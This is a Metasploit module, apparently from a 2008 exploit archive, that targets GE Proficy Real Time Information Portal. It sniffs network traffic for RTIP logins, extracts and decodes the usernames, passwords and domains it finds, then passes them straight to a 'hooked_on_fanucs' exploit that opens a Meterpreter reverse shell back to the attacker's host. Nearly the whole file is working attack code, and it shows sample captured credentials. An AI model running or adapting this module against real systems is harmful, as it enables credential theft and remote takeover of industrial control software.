GE Proficy Real Time Information Portal - Credentials Leak Sniffer (Metasploit)

##
# $Id: rtipsniff.rb 
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
#
# MacbookPro:metasploit kfinisterre$ cd /Users/kfinisterre/Desktop/metasploit; sudo ./msfcli auxiliary/test/rtipsniff INTERFACE=en1  E
# [*] Opening the network interface...
# [*] Sniffing RTIP login requests...
# [*] Proficy RTIP Credentials -> user: Administrator pass: This was base64 encoded domain: ProficySniffTest
#
# 
#


require 'msf/core'


class Metasploit3 < Msf::Auxiliary

	include Msf::Auxiliary::Report
	include Msf::Exploit::Capture
	
	def initialize
		super(
			'Name'        => 'GE Proficy Real Time Information Portal Credentials Leak',
			'Version'     => '$Revision: 1 $',
			'Description' => 'This module sniffs RTIP login requests from the network',
			'Author'      => ['hdm','kf'],
			'License'     => MSF_LICENSE,
			'Actions'     =>
				[
				 	[ 'Sniffer' ]
				],
			'PassiveActions' => 
				[
					'Sniffer'
				],
			'DefaultAction'  => 'Sniffer'
		)
		register_options([
                        OptAddress.new('LHOST', [true, 'The IP address to use for reverse-connect payloads']),
                        OptPort.new('LPORT', [false, 'The starting TCP port number for reverse-connect payloads', 4444])
                ], self.class)
	end

        def init_hooked_on_fanucs(name,user,pass,domain, rhost, targ = 0)
                targ ||= 0
                payload='windows/meterpreter/reverse_tcp'
                sploit = framework.modules.create(name)
                
                sploit.datastore['USERNAME']   = user
                sploit.datastore['PASSWORD']   = pass
                sploit.datastore['DOMAIN']   = domain
                sploit.datastore['RHOST']   = rhost
                sploit.datastore['LPORT']   = datastore['LPORT']
                sploit.datastore['LHOST']   = datastore['LHOST']
                sploit.exploit_simple(
                        'LocalInput'     => self.user_input,
                        'LocalOutput'    => self.user_output,
                        'Target'         => targ,
                        'Payload'        => payload,
                        'RunAsJob'       => true)
        end
                

	def run
		username = "a", password = "b", domain = "c"

		print_status("Opening the network interface...")
		open_pcap()

		print_status("Sniffing RTIP login requests...")
		each_packet() do |pkt|
			next if not pkt.tcp?
			
                        if (pkt.payload =~ /\x56\x5d\x72\x2b\x30\xd7\xf2\xc6\x74/)

                                marker = "\x56\x5d\x72\x2b\x30\xd7\xf2\xc6\x74"
                                data = pkt.payload
 
                                credentials = data.split(marker)[1].split("\x00")  
                                username = credentials[1]
                                password = credentials[2]
                                domain = credentials[3].split("\x01")[0]
                                username = username[1..(username.length-2)]
                                password = password[1..(password.length-2)].unpack("m")
                                domain = domain[1..(domain.length-2)]
                                print_status("Proficy RTIP Credentials -> user: #{username} pass: #{password} domain: #{domain} ip: #{pkt.ip_daddr}")
				
			        init_hooked_on_fanucs('exploit/windows/misc/hooked_on_fanucs',"#{username}","#{password}","#{domain}", "#{pkt.ip_daddr}")
                        end
			
			true
		end
		
		print_status("Finished sniffing")
	end
	
end

# milw0rm.com [2008-11-08]